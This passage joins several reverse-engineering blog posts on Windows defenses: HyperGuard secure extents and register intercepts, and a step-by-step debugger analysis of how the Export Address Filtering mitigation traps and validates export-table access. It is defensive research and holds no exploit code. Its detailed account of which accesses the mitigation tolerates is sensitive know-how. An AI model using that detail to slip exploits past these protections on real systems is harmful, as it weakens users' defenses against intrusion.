    HV_REGISTER_CR_INTERCEPT_CONTROL InterceptControl;
    ULONG64 Cr0Value;
    ULONG64 Cr4Value;
    ULONG64 Ia32MiscEnableValue;
} REGISTER_INTERCEPT_INFORMATION, *PREGISTER_INTERCEPT_INFORMATION;

The InterceptControl mask is built while iterating over the input extents, and the values for CR0, CR4 and IA32_MISC_ENABLE are read from the SKPRCB (their values, together with the values for all other potentially-intercepted registers, are placed there in SkeInitSystem, triggered from a secure call with code SECURESERVICE_PHASE3_INIT).

This structure is sent to ShvlSetRegisterInterceptMasks, which in turn calls ShvlSetVpRegister on each of the four values in the input structure to register an intercept. Setting the register values is done by initiating a fast hypercall with a code of HvCallSetVpRegisters (0x51), sending four arguments (for anyone interested, all hypercall values are documented here). The last two arguments are of types HV_REGISTER_NAME and HV_REGISTER_VALUE – these types are documented so it’s easy to see what registers are being set:

Looking at the function, we see that it’s setting the required values for CR0, CR4 and IA32_MISC_ENABLE, and finally setting the mask for intercept control, so from this point all requested registers are intercepted by the hypervisor and any access to them will be forwarded to the SKPG intercept routine.

Secure VA Translation Extents

In the previous post I introduced the secure extents – extents indicating VTL1 memory or data structures to be protected. I also covered memory extents, including the secure memory extents. Here is another kind of secure extent, which is initialized internally in the secure kernel, without using input extents from VTL0. These are called Secure VA Translation Extents and are initialized inside SkpgCreateSecureVaTranslationExtents. These extents are used to protect virtual->physical address translations for different pages or memory regions that are a common target for attack:

  • 0x100B: SkpgExtentProcessorMode
  • 0x100E: SkpgExtentLoadedModule
  • 0x100F: SkpgExtentProcessorState
  • 0x1010: SkpgExtentKernelCfgBitmap
  • 0x1011: SkpgExtentZeroPage
  • 0x1012: SkpgExtentAlternateInvertedFunctionTable
  • 0x1015: SkpgExtentSecureExtensionTable
  • 0x1017: SkpgExtentKernelVAProtection
  • 0x1019: SkpgExtentSecurePool

Though they are called secure extents, the data they protect is mostly VTL0 data, such as the VTL0 mapping of the KCFG bitmap or the inverted function table. The exact validations done differ between the types: for example, the zero page should never be mapped so a successful virtual->physical address translation of the zero page should not be acceptable, while the kernel CFG bitmap should have valid translations but the VTL0 mapping of those pages should always be read-only.

Looking at SkpgCreateSecureVaTranslationExtents, we can see that the extents are initialized with no input data or memory ranges:

This is because all of these extents correspond to specific data structures that are initialized elsewhere, so the data doesn’t need to be part of the extent itself and the type is the only field that needs to be set. We can also see that some of these extents are only initialized when KCFG is enabled, since without it they are not needed. I will cover the checks done for each of these extents in a later blog post, which will describe SKPG extent verification.

Finally, if HotPatching is enabled, two more extents are added, both with type SkpgExtentExtensionTable:

These extents protect the SkpgSecureExtension and SkpgNtExtension variables, which keep track of HotPatching data.

Per-Processor Extents

There are two more extents that are processor-specific, since the data they protect exists separately in each processor. However, unlike the MSR and Control Register extents, no intercepts need to be installed and no function needs to be executed on all processors (for now). These extents are also received from the normal kernel and added to the array of extents in the SKPG_CONTEXT structure. The data received for each of these two extents includes base address, limit and a processor number, so multiple entries might exist for these extent types, with different processor numbers:

  • 0x1004: SkpgExtentIdt
  • 0x1005: SkpgExtentGdt

These extents contain the memory range for the GDT and IDT tables on each processor, so HyperGuard will protect them from malicious modifications.

Unused Extents

Extent types 0x1007, 0x1008, 0x1013 and 0x1018 never get initialized anywhere in SecureKernel.exe and don’t seem to be used anywhere. They may be deprecated or not fully implemented yet.

An Exercise in Dynamic Analysis

Analyzing the PayloadRestrictions.dll Export Address Filtering

This post is a bit different from my usual ones. It won’t cover any new security features or techniques and won’t share any novel security research. Instead, it will guide you through the process of analyzing an unknown mitigation through a real-life example in Windows Defender Exploit Guard (formerly EMET). Because the goal here is to show a step-by-step, real life research process, the post will be a bit disorganized and will follow a more organic and messy train of thought.

A brief explanation of Windows Defender Exploit Guard: formerly known as EMET, this is a DLL that gets injected on demand and implements several security mitigations such as Export Address Filtering, Import Address Filtering, Stack Integrity Validations, and more. These are all disabled by default and need to be manually enabled in the Windows security settings, either for a specific process or for the whole system. Since EMET was integrated into Windows, these mitigations are implemented in PayloadRestrictions.dll, which can be found in C:\Windows\System32.

This post will follow one of these mitigations, Export Address Filtering (or EAF), and demonstrate a step-by-step approach to analyzing it, using both dynamic analysis in WinDbg and static analysis in IDA and Hex-Rays. I’ll try to highlight the things that should be focused on when analyzing a mitigation and show that even with partial information we can reach useful conclusions and learn about this feature.

First, we’ll enable EAF in calc.exe in the Windows Security settings:

We don’t know anything about this mitigation yet other than the one-line description in the security settings, so we’ll start by running calc.exe under a debugger to see what happens. Immediately we can see PayloadRestrictions.dll get loaded into the process:

And almost right away we get a guard page violation:

What is at this mysterious address and why does accessing it throw a guard page violation?

To start answering the first question, we can run !address to get a few more details about the address causing the exception:

!address 00007ffe`3da6416c
 
Usage:                  Image
Base Address:           00007ffe`3d8b9000
End Address:            00007ffe`3da7a000
Region Size:            00000000`001c1000 (   1.754 MB)
State:                  00001000          MEM_COMMIT
Protect:                00000002          PAGE_READONLY
Type:                   01000000          MEM_IMAGE
Allocation Base:        00007ffe`3d730000
Allocation Protect:     00000080          PAGE_EXECUTE_WRITECOPY
Image Path:             C:\WINDOWS\System32\kernelbase.dll
Module Name:            kernelbase
Loaded Image Name:
Mapped Image Name:
More info:              lmv m kernelbase
More info:              !lmi kernelbase
More info:              ln 0x7ffe3da6416c
More info:              !dh 0x7ffe3d730000
 
 
Content source: 1 (target), length: 15e94

Now we know that this address is in a read-only page inside KernelBase.dll. But we don’t have any information that will help us understand what this page is and why it’s guarded. Let’s follow the suggestion of the command output and run !dh to dump the headers of KernelBase.dll to get some more information (showing partial output here since full output is very long):

!dh 0x7ffe3d730000

File Type: DLL
FILE HEADER VALUES
8664 machine (X64)
7 number of sections
FE317FB0 time date stamp Sat Feb 21 05:53:36 2105

0 file pointer to symbol table
0 number of symbols
F0 size of optional header
2022 characteristics
Executable
App can handle >2gb addresses
DLL

OPTIONAL HEADER VALUES
20B magic #
14.30 linker version
188000 size of code
211000 size of initialized data
0 size of uninitialized data
89FE0 address of entry point
1000 base of code
----- new -----
00007ffe3d730000 image base
1000 section alignment
1000 file alignment
3 subsystem (Windows CUI)
10.00 operating system version
10.00 image version
10.00 subsystem version
39A000 size of image
1000 size of headers
3A8E61 checksum
0000000000040000 size of stack reserve
0000000000001000 size of stack commit
0000000000100000 size of heap reserve
0000000000001000 size of heap commit
4160 DLL characteristics
High entropy VA supported
Dynamic base
NX compatible
Guard
334150 [ F884] address [size] of Export Directory
3439D4 [ 50] address [size] of Import Directory
369000 [ 548] address [size] of Resource Directory
34F000 [ 18828] address [size] of Exception Directory
397000 [ 92D0] address [size] of Security Directory
36A000 [ 2F568] address [size] of Base Relocation Directory
29B8C4 [ 70] address [size] of Debug Directory
0 [ 0] address [size] of Description Directory
0 [ 0] address [size] of Special Directory
255C20 [ 28] address [size] of Thread Storage Directory
1FB6D0 [ 140] address [size] of Load Configuration Directory
0 [ 0] address [size] of Bound Import Directory
2569D8 [ 16E0] address [size] of Import Address Table Directory
331280 [ 620] address [size] of Delay Import Directory
0 [ 0] address [size] of COR20 Header Directory
0 [ 0] address [size] of Reserved Directory

Our faulting address is 0x7ffe3da6416c, which is at offset 0x33416c inside KernelBase.dll. Looking for the closest match in the output of !dh we can find the export directory at offset 0x334150:

334150 [    F884] address [size] of Export Directory

So the faulting code is trying to access an entry in the KernelBase export table. That shouldn’t happen under normal circumstances – if you debug another process (one that doesn’t have EAF enabled) you will not see any exceptions being thrown when accessing the export table. So we can guess that PayloadRestrictions.dll is causing this, and we’ll soon see how and why it does it.
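For context, this is the same export-directory lookup that a manual GetProcAddress implementation (or typical shellcode) performs. A minimal sketch of locating KernelBase’s export directory, which is exactly the region EAF guards, might look like this:

#include <windows.h>
#include <stdio.h>

int main(void)
{
    //
    // Walk the PE headers of kernelbase.dll to find its export directory -
    // under EAF, reading this guarded region is what raises the
    // STATUS_GUARD_PAGE_VIOLATION seen in the debugger.
    //
    BYTE* base = (BYTE*)GetModuleHandleW(L"kernelbase.dll");
    IMAGE_DOS_HEADER* dosHeader = (IMAGE_DOS_HEADER*)base;
    IMAGE_NT_HEADERS* ntHeaders = (IMAGE_NT_HEADERS*)(base + dosHeader->e_lfanew);
    IMAGE_DATA_DIRECTORY* exportDir =
        &ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    IMAGE_EXPORT_DIRECTORY* exports =
        (IMAGE_EXPORT_DIRECTORY*)(base + exportDir->VirtualAddress);

    printf("export directory at RVA 0x%lx, %lu named exports\n",
           exportDir->VirtualAddress, exports->NumberOfNames);
    return 0;
}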

One thing to note about guard page violations is this, quoted from this MSDN page:

If a program attempts to access an address within a guard page, the system raises a STATUS_GUARD_PAGE_VIOLATION (0x80000001) exception. The system also clears the PAGE_GUARD modifier, removing the memory page’s guard page status. The system will not stop the next attempt to access the memory page with a STATUS_GUARD_PAGE_VIOLATION exception.

So this guard page violation should only happen once and then get removed and never happen again. However, if we continue the execution of calc.exe, we’ll soon see another page guard violation on the same address:

This means the guard page somehow came back and is set on the KernelBase export table again.

The best guess in this case would probably be that someone registered an exception handler which gets called every time a guard page violation happens and immediately sets the PAGE_GUARD flag again, so that the same exception happens the next time anything accesses the export table. Unfortunately, there is no good way to view registered exception handlers in WinDbg (unless you set “enable exception logging” in gflags, which enables the !exrlog extension, but I won’t be doing that now). However, we know that the DLL registering the suspected exception handler is most likely PayloadRestrictions.dll, so we’ll open it in IDA and take a look.

When looking for calls to RtlAddVectoredExceptionHandler, the function used to register exception handlers, we only see two results:

Both register the same exception handler — MitLibExceptionHandler:

(on a side note – I don’t often choose to use the IDA disassembler instead of the Hex-Rays decompiler, but PayloadRestrictions.dll uses some things that the decompiler doesn’t handle too well, so I’ll be switching between the disassembler and decompiler code in this post)

We can set a breakpoint on this exception handler and see that it gets called from the same address that threw the page guard violation exception earlier (ntdll!LdrpSnapModule+0x23b):

Looking at the exception handler itself we can see it’s quite simple:

It only handles two exception codes:

  1. STATUS_GUARD_PAGE_VIOLATION
  2. STATUS_SINGLE_STEP

When a guard page violation happens, we can see MitLibValidateAccessToProtectedPage get called. Looking at this function, we can tell that a lot of it is dedicated to checks related to Import Address Filtering. We can guess that based on the address comparisons to the global IatShadowPtr variable and calls to various IAF functions:

Some of the code here is relevant for EAF, but for simplicity we’ll skip most of it (for now). Just by quickly scanning through this function and all the ones called by it, it doesn’t look like anything here is resetting the PAGE_GUARD modifier on the export table page.

What might give us a hint is to go back to WinDbg and continue program execution:

We’re immediately hitting another exception at the next instruction, this time a single step exception. A single step exception is normally triggered by debuggers when requesting a single step, such as when walking a function instruction by instruction. But in this case I asked the debugger to continue the execution, not do a single step, so it wasn’t WinDbg that triggered this exception.

The way a single step exception is triggered is by setting the Trap Flag (bit 8) of the EFLAGS register inside the context record. And if we look towards the end of MitLibValidateAccessToProtectedPage we can see it doing exactly that:

So far we’ve seen PayloadRestrictions.dll do the following:

  1. Set the PAGE_GUARD modifier on the export table page.
  2. When the export table page is accessed, catch the exception with MitLibExceptionHandler and call MitLibValidateAccessToProtectedPage if this is a guard page violation.
  3. Set the Trap Flag in EFLAGS to generate a single step exception on the next instruction once execution resumes.

This matches the fact that MitLibExceptionHandler handles exactly two exception codes – guard page violations and single steps. So on the next instruction we receive the now expected single step exception and go right into MitLibHandleSingleStepException:

This is obviously a cleaned-up version of the original output. I saved you some of the work of checking what the global variables are and renaming them since this isn’t an especially interesting step – for example to check what function is pointed to by the variable I named pNtProtectVirtualMemory I simply dumped the pointer in WinDbg and saw it pointing to NtProtectVirtualMemory.

Back to the point – there are some things in this function that we’ll ignore for now and come back to later. What we can focus on is the call to NtProtectVirtualMemory, which (at least through one code path) sets the protection to PAGE_GUARD and PAGE_READONLY. Even without fully understanding everything we can make an educated guess and say that this is most likely the place where the KernelBase.dll export table guard page flag gets reset.
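To convince ourselves that this guard page + single step loop really works the way we think it does, we can reproduce its core in a standalone program. This is only a minimal sketch of the technique, not PayloadRestrictions code: it guards a page of our own, lets the first access complete with the trap flag set, and re-arms the guard from the single step exception:

#include <windows.h>
#include <stdio.h>

static BYTE* g_guardedPage;

LONG CALLBACK GuardLoopHandler(EXCEPTION_POINTERS* info)
{
    DWORD code = info->ExceptionRecord->ExceptionCode;
    DWORD oldProtect;

    if (code == STATUS_GUARD_PAGE_VIOLATION)
    {
        //
        // The CPU already cleared PAGE_GUARD; set the trap flag (bit 8 of
        // EFLAGS) so we get a single step exception right after the faulting
        // instruction finishes.
        //
        printf("guard page hit at %p\n",
               (void*)info->ExceptionRecord->ExceptionInformation[1]);
        info->ContextRecord->EFlags |= 0x100;
        return EXCEPTION_CONTINUE_EXECUTION;
    }

    if (code == STATUS_SINGLE_STEP)
    {
        //
        // Re-arm the guard page so the next access faults again, and make sure
        // the trap flag is clear so we don't keep single stepping.
        //
        VirtualProtect(g_guardedPage, 0x1000, PAGE_READONLY | PAGE_GUARD, &oldProtect);
        info->ContextRecord->EFlags &= ~0x100;
        return EXCEPTION_CONTINUE_EXECUTION;
    }

    return EXCEPTION_CONTINUE_SEARCH;
}

int main(void)
{
    DWORD oldProtect;

    g_guardedPage = (BYTE*)VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    g_guardedPage[0] = 0x41;

    AddVectoredExceptionHandler(1, GuardLoopHandler);
    VirtualProtect(g_guardedPage, 0x1000, PAGE_READONLY | PAGE_GUARD, &oldProtect);

    //
    // Every read trips the guard page; the handler lets it through and re-arms
    // the guard - the same loop EAF runs on the export table pages.
    //
    for (int i = 0; i < 3; i++)
    {
        volatile BYTE value = g_guardedPage[0];
        (void)value;
    }
    return 0;
}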

Now that we know the mechanism behind the two exceptions we’re seeing, we can go back to MitLibValidateAccessToProtectedPage to go over all the parts we skipped earlier and see what happens when a guard page violation occurs. The first thing we see is a check of whether the faulting address is inside the IatShadow page. We can keep ignoring this one since it’s related to another feature (IAF) that we haven’t enabled for this process. We move on to the next section, which I titled FaultingAddressIsNotInShadowIat:

I already renamed some of the variables used here for convenience, but we’ll go over how I reached those names and titles and what this whole section does. First, we see the DLL using three global variables – g_MitLibState, a large global structure that contains all sorts of data used by PayloadRestrictions.dll, and two unnamed variables that I chose to call NumberOfModules and NumberOfProtectedRegions – we’ll soon see why I chose those names.

At a first glance, we can tell that this code is running in a loop. In each iteration it accesses some structure in g_MitLibState+0x50+index. This means there is some array at g_MitLibState+0x50, where each entry is some unknown structure. From this code, we can tell that each structure in the array is sized 0x28 bytes. Now we can either try to statically search for the function in the DLL that initializes this array and try to figure out what the structure contains, or we can go back to WinDbg and dump the already-initialized array in memory:

When dumping unknown memory it’s useful to use the dps command to check if there are any known symbols in the data. Looking at the array in memory we can see there are 3 entries. Using the dps output we can see that the first field in each of the structures is the base address of one module: Ntdll, KernelBase and Kernel32. Immediately following it there is a ULONG. Based on the context and the alignment we can guess that this might be the size of the DLL. A quick WinDbg query shows that this is correct:

0:007> dx @$curprocess.Modules.Where(m => m.Name.Contains("ntdll.dll")).Select(m => m.Size)
@$curprocess.Modules.Where(m => m.Name.Contains("ntdll.dll")).Select(m => m.Size)                
    [0x19]           : 0x211000
0:007> dx @$curprocess.Modules.Where(m => m.Name.Contains("kernelbase.dll")).Select(m => m.Size)
@$curprocess.Modules.Where(m => m.Name.Contains("kernelbase.dll")).Select(m => m.Size)                
    [0x7]            : 0x39a000
0:007> dx @$curprocess.Modules.Where(m => m.Name.Contains("kernel32.dll")).Select(m => m.Size)
@$curprocess.Modules.Where(m => m.Name.Contains("kernel32.dll")).Select(m => m.Size)                
    [0xc]            : 0xc2000

Next we have a pointer to the base name of the module:

0:007> dx -r0 (wchar_t*)0x00007ffe1a4926b0
(wchar_t*)0x00007ffe1a4926b0                 : 0x7ffe1a4926b0 : "ntdll.dll" [Type: wchar_t *]
0:007> dx -r0 (wchar_t*)0x00000218f42a7d68
(wchar_t*)0x00000218f42a7d68                 : 0x218f42a7d68 : "kernelbase.dll" [Type: wchar_t *]
0:007> dx -r0 (wchar_t*)0x00000218f42a80c8
(wchar_t*)0x00000218f42a80c8                 : 0x218f42a80c8 : "kernel32.dll" [Type: wchar_t *]

And another pointer to the full path of the module:

0:007> dx -r0 (wchar_t*)0x00000218f42a7970
(wchar_t*)0x00000218f42a7970                 : 0x218f42a7970 : "C:\WINDOWS\SYSTEM32\ntdll.dll" [Type: wchar_t *]
0:007> dx -r0 (wchar_t*)0x00000218f42a7d40
(wchar_t*)0x00000218f42a7d40                 : 0x218f42a7d40 : "C:\WINDOWS\System32\kernelbase.dll" [Type: wchar_t *]
0:007> dx -r0 (wchar_t*)0x00000218f42a80a0
(wchar_t*)0x00000218f42a80a0                 : 0x218f42a80a0 : "C:\WINDOWS\System32\kernel32.dll" [Type: wchar_t *]

Finally we have a ULONG that is used in this function to indicate whether or not to check this range, so I named it CheckRipInModuleRange. When put together, we can build the following structure:

typedef struct _MODULE_INFORMATION {
    PVOID ImageBase;
    ULONG ImageSize;
    PWCHAR ImageName;
    PWCHAR FullImagePath;
    ULONG CheckRipInModuleRange;
} MODULE_INFORMATION, *PMODULE_INFORMATION;

We could define this structure in IDA and get a much nicer view of the code but I’m trying to keep this post focused on analyzing this feature so I just annotated the idb with the field names.

Now that we know what this array contains we can have a better idea of what this code does – It iterates over the structures in this array and checks if the instruction pointer that accessed the guarded page is inside one of those modules. When the loop is done – or the code found that the faulting RIP is in one of those modules – it sets r8 to the index of the module (or leaves it as -1 if a module is not found) and moves on to the next checks:

Here we have another loop, this time iterating over an array in g_MitLibState+0x5D0, where each structure is sized 0x18, and comparing it to the address that triggered the exception (in our case, the address inside the KernelBase export table). Now we already know what to do so we’ll go and dump that array in memory:

We have here three entries, each containing what looks like a start address, end address and some flag. Let’s see what each of these ranges are:

  1. First range starts at the base address of NTDLL and spans 0x160 bytes, so pretty much covers the NTDLL headers.
  2. Second range is one we’ve been looking at since the beginning of the post – this is the KernelBase.dll export table.
  3. Third range is the Kernel32.dll export table (I won’t show how we can find this out because we’ve done this for KernelBase earlier in the post).

It’s safe to assume these are the memory regions that PayloadRestrictions.dll protects and that this check is meant to check that this guard page violation was triggered for one of its protected ranges and not some other guarded page in the process.

I won’t go into as many details for the other checks in this function because that would mostly involve repeating the same steps over and over and this post is pretty long as it is. Instead we’ll look a bit further ahead at this part of the function:

This code path is called if the instruction pointer is found in one of the registered modules. Even without looking inside any of the functions that are called here we can guess that MitLibMemReaderGadgetCheck looks at the instruction that accessed the guarded page and compares it to the expected instructions, and MitLibReportAddressFilterViolation is called to report unexpected behavior if the instruction is considered “bad”.

A different path is taken if the saved RIP is not in one of the known modules, which involves two final checks. The first checks if the saved RSP is inside the stack, and if it isn’t, MitLibReportAddressFilterViolation is called to report potential exploitation:

The second calls RtlPcToFileHeader to get the base address of the module that the saved RIP is in and reports a violation if one is not found since that means the guarded page was accessed from within dynamic code and not an image:

All cases where MitLibReportAddressFilterViolation is called will eventually lead to a call to MitLibTriggerFailFast:

This ends up terminating the process, therefore blocking the potential exploit. If no violation is found, the function enables a single step exception for the next instruction that’ll run and the whole cycle begins again.

Of course we could keep digging into the DLL to learn about the initialization of this feature, the gadgets being searched for, or what happens when a violation is reported, but I’ll leave those as assignments for someone else. For now we’ve gained a good understanding of what EAF is and how it works, which will allow us to further analyze it or search for potential bypasses, as well as some tools for analyzing similar mechanisms in PayloadRestrictions.dll or other security products.

HyperGuard – Secure Kernel Patch Guard: Part 2 – SKPG Extents

Welcome to Part 2 of the series about Secure Kernel Patch Guard, also known as HyperGuard. This part will start describing the data structure and components of SKPG, and more specifically the way it’s activated. If you missed Part 1, you can find it right here.

Inside HyperGuard Activation

In Part 1 of the series I introduced HyperGuard and described its different initialization paths. Whichever path we go through, we end up reaching SkpgConnect when the normal kernel has finished its initialization. This is when all important data structures in the kernel have already been initialized and can start being monitored and protected by PatchGuard and HyperGuard.

After a couple of standard input validations, SkpgConnect acquires SkpgConnectionLock and checks the SkpgInitialized global variable to tell if HyperGuard has already been initialized. If the variable is set, the function will return STATUS_ACCESS_DENIED or STATUS_SUCCESS, depending on the information received. In either of those cases, it will do nothing else.

If SKPG has not been initialized yet, SkpgConnect will start initializing it. First it calculates and saves multiple random values to be used in several different checks later on. Then it allocates and initializes a context structure, saved in the global SkpgContext. Before we move on to other SKPG areas, it’s worth spending a bit of time talking about the SKPG context.

SKPG Context

This SKPG context structure is allocated and initialized in SkpgConnect and will be used in all SKPG checks. It contains all the data needed for HyperGuard to monitor and protect the system, such as the NT PTE information, encryption algorithms, KCFG ranges, and more, as well as another timer and callback, separate from the ones we saw in the first part of the series. Unfortunately, like the rest of HyperGuard, this structure, which I’ll call SKPG_CONTEXT, is not documented and so we need to do our best to figure out what it contains and how it’s used.

First, the context needs to be allocated. This context has a dynamic size that depends on the data received from the normal kernel. Therefore, it is calculated at runtime using the function SkpgComputeContextSize. The minimal size of the structure is 0x378 bytes (this number tends to increase every few Windows builds as the context structure gains new fields) and to that will be added a dynamic size, based on the data sent from the normal kernel.

That input data, which is only sent when SKPG is initialized through the PatchGuard code paths, is an array of structures named Extents. These extents describe different memory regions, data structures and other system components to be protected by HyperGuard. I will cover all of these in more detail later in the post, but a few examples include the GDT and IDT, data sections in certain protected modules and MSRs with security implications.

After the required size is calculated, the SKPG_CONTEXT structure is allocated and some initial fields are set in SkpgAllocateContext. A couple of these fields include another secure timer and a related callback, whose functions are set to SkpgHyperguardTimerRoutine and SkpgHyperguardRuntime. It also sets fields related to PTE addresses and other paging-related properties, since a lot of the HyperGuard checks validate correct Virtual->Physical page translations.

Afterwards, SkpgInitializeContext is called to finish initializing the context using the extents provided by the normal kernel. This basically means iterating over the input array, using the data to initialize internal extent structures, that I’ll call SKPG_EXTENT, and sticking them at the end of the SKPG_CONTEXT structure, with a field I chose to call ExtentOffset pointing to the beginning of the extent array (notice that none of these structures are documented, so all structure and field names are made up):

SKPG Extents

There are many different types of extents, and each SKPG_EXTENT structure has a Type field indicating its type. Each extent also has a hash, used in some cases to validate that no changes were done to the monitored memory region. Then there are fields for the base address of the monitored memory and the number of bytes, and finally a union that contains data unique to each extent type. For reference, here is the reverse engineered SKPG_EXTENT structure:

typedef struct _SKPG_EXTENT
{
    USHORT Type;
    USHORT Flags;
    ULONG Size;
    PVOID Base;
    ULONG64 Hash;
    UCHAR TypeSpecificData[0x18];
} SKPG_EXTENT, *PSKPG_EXTENT;

I mentioned that the input extents used by HyperGuard were provided by the PatchGuard initializer function in the normal kernel. But SKPG initializes another kind of extents as well – secure extents. To initialize those, SkpgInitializeContext calls into SkpgCreateSecureKernelExtents, providing the SKPG_CONTEXT structure and the address where the current extent array ends – so the secure extents can be placed there. Secure extents use the same SKPG_EXTENT structure as regular extents and protect data in the secure kernel, such as modules loaded into the secure kernel and secure kernel memory ranges.

Extent Types

Like I mentioned, there are many different types of extents, each used by HyperGuard to protect a different part of the system. However, we can split them into a few groups that share similar traits and are handled in a similar way. For clarity and to separate normal extents from secure extents, I will use the naming convention SkpgExtent for normal extent types and SkpgExtentSecure for secure extent types.

The first extent that I’d like to cover is a pretty simple one that always gets sent to SkpgInitializeContext regardless of other input:

Initialization Extent

There is one extent that doesn’t belong in any of the groups since it is not involved in any of the HyperGuard validations. This is extent 0x1000: SkpgExtentInit – this extent is not copied to the array in the context structure. Instead, this extent type is created by SkpgConnect and sent into SkpgInitializeContext to set some fields in the context structure itself that were previously unpopulated. These fields have additional hashes and information related to hotpatching, such as whether it is enabled and the addresses of the retpoline code pages. It also sets some flags in the context structure to reflect some configuration options in the machine.

Memory and Module Extents

This group includes the following extent types:

  • 0x1001: SkpgExtentMemory
  • 0x1002: SkpgExtentImagePage
  • 0x1009: SkpgExtentUnknownMemoryType
  • 0x100A: SkpgExtentOverlayMemory
  • 0x100D: SkpgExtentSecureMemory
  • 0x1014: SkpgExtentPartialMemory
  • 0x1016: SkpgExtentSecureModule

The thing all these extent types have in common is that they all indicate some memory range to be protected by HyperGuard. Most of these contain memory ranges in the normal kernel, however SkpgExtentSecureMemory and SkpgExtentSecureModule have VTL1 memory ranges and modules. Still, all these extent types are handled in a similar way regardless of the memory type or VTL so I grouped them together.

When normal memory extents are being added to the SKPG Context, all normal kernel address ranges get validated to ensure that the pages have a valid mapping for SKPG protection. For a normal kernel page to be valid for SKPG protection, the page can’t be writable. SKPG will monitor all requested pages for changes, so a writable page, whose contents can change at any time, is not a valid “candidate” for this kind of protection. Therefore, SKPG can only monitor pages whose protection is either “read” or “execute”. Obviously, only valid pages (as indicated by the Valid bit in the PTE) can be protected. There are slight differences to some of the memory extents when HVCI is enabled as SKPG can’t handle certain page types in those conditions.

Once mapped and verified, each memory page that should be protected gets hashed, and the hash gets saved into the SKPG_EXTENT structure, where it will be used in future HyperGuard checks to validate that the page wasn’t modified.
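Conceptually (and only conceptually – the real hashing algorithm is internal to the secure kernel, and the trivial hash below is just a stand-in), a later check then looks something like this:

//
// Conceptual sketch only: the real hashing algorithm used by the secure
// kernel is not shown here; a trivial rolling hash stands in for it.
//
ULONG64
SkpgSketchHashPage (
    _In_reads_bytes_(Size) PUCHAR Page,
    _In_ ULONG Size
    )
{
    ULONG64 hash = 0;
    for (ULONG i = 0; i < Size; i++)
    {
        hash = (hash << 5) ^ hash ^ Page[i];
    }
    return hash;
}

//
// Re-hash the monitored page and compare the result to the hash saved in the
// extent at initialization time - a mismatch means the page was modified.
//
BOOLEAN
SkpgSketchValidateExtent (
    _In_ PSKPG_EXTENT Extent
    )
{
    ULONG64 currentHash = SkpgSketchHashPage((PUCHAR)Extent->Base, Extent->Size);
    return (BOOLEAN)(currentHash == Extent->Hash);
}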

Some memory extents describe a generic memory range, and some, like SkpgExtentImagePage, describe a specific memory type that needs to be treated slightly differently. This extent type mentions a specific image in the normal kernel, but HyperGuard should not be protecting the whole image, only a part of it. So the input extent has the image base, the page offset inside the image where the protection should start and the requested size. Here too the memory region to be protected will be hashed and the hash will be saved into the SKPG_EXTENT to be used in future validations.

But the SKPG_EXTENT structures that get written into the SKPG Context normally only describe a single memory page while the system might want to protect a much larger area in an image. It is simply easier for HyperGuard to handle memory validations one page at a time, to make for more predictable processing time and avoid taking up too much time while hashing large memory ranges, for example. So, when receiving an input extent where the requested size is larger than a page (0x1000 bytes), SkpgInitializeContext iterates over all the pages in the requested range and creates a new SKPG_EXTENT for each of them. Only the first extent, describing the first page in the range, receives the type SkpgExtentImagePage. All the other ones that describe the following pages receive a different type, 0x1014, which I chose to call SkpgExtentPartialMemory, and the original extent type is placed in the first 2 bytes of the type-specific data inside the SKPG_EXTENT structure.
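A hedged sketch of that splitting logic, using the SKPG_EXTENT layout from above (the function name, the helper constants and the omission of all the real validation are mine):

#define SKPG_EXTENT_IMAGE_PAGE      0x1002  // SkpgExtentImagePage
#define SKPG_EXTENT_PARTIAL_MEMORY  0x1014  // SkpgExtentPartialMemory
#define SKPG_PAGE_SIZE              0x1000

//
// Split an input extent that covers more than one page into per-page
// SKPG_EXTENT entries, as described above. Out points at the next free slot
// in the extent array at the end of the SKPG context.
//
VOID
SketchSplitExtent (
    PSKPG_EXTENT Out,
    PVOID Base,
    ULONG Size,
    USHORT OriginalType
    )
{
    for (ULONG offset = 0; offset < Size; offset += SKPG_PAGE_SIZE, Out++)
    {
        ULONG remaining = Size - offset;

        Out->Base = (PUCHAR)Base + offset;
        Out->Size = (remaining < SKPG_PAGE_SIZE) ? remaining : SKPG_PAGE_SIZE;

        if (offset == 0)
        {
            //
            // The first page keeps the original extent type.
            //
            Out->Type = OriginalType;
        }
        else
        {
            //
            // Following pages become partial-memory extents that remember
            // the original type in the type-specific data.
            //
            Out->Type = SKPG_EXTENT_PARTIAL_MEMORY;
            *(USHORT*)Out->TypeSpecificData = OriginalType;
        }

        //
        // The hash of the page would be computed and stored in Out->Hash here.
        //
    }
}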

Every extent in the array can be marked by different flags. One of these is the Protected flag, which can only be applied to normal kernel extents, meaning that the specified address range should be protected from changes by SKPG. In this case, SkpgInitializeContext will call SkmmPinNormalKernelAddressRange on the requested address range to pin it and prevent it from being freed by VTL0 code:

The secure memory extents essentially behave very similarly to the normal memory extents, with the main differences being that they are initialized by the secure kernel itself and the details of what they protect.

Extents of type SkpgExtentSecureModule are generated to monitor all images loaded into the secure kernel space. This is done by iterating the SkLoadedModuleList global list, which, like the normal kernel’s PsLoadedModuleList, is a linked list of KLDR_DATA_TABLE_ENTRY structures representing all loaded modules. For each one of those modules, SkpgCreateSecureModuleExtents is called to generate the extents.

To do so, SkpgCreateSecureModuleExtents receives a KLDR_DATA_TABLE_ENTRY for one loaded DLL at a time, validates that it exists in PsInvertedFunctionTable (a table containing basic information for all loaded DLLs, mostly used for quick search for exception handlers) and then enumerates all the sections in the module. Most sections in a secure module are monitored using an SKPG_EXTENT but are not protected from modifications. Only one section is being protected, the TABLERO section:

The TABLERO section is a data section that exists in only a handful of binaries. In the normal kernel it exists in Win32k.sys, where it contains the win32k system service table. In the secure kernel a TABLERO section exists in securekernel.exe, where it contains global variables such as SkiSecureServiceTable, SkiSecureArgumentTable, SkpgContext, SkmiNtPteBase, and others:

When SkpgCreateSecureModuleExtents encounters a TABLERO section, it calls SkmmProtectKernelImageSubsection to change the PTE for the section pages from the default read-write to read only.

Then for each section, regardless of its type, an extent with type SkpgExtentSecureModule is created. Each memory region gets hashed, and a flag in the extent marks whether the section is executable. The number of extents generated per section can vary: If HotPatching is enabled on the machine a separate extent will be generated for every page in the protected image ranges. Otherwise, every protected section generates one extent that might cover multiple pages, all of them with type SkpgExtentSecureModule:

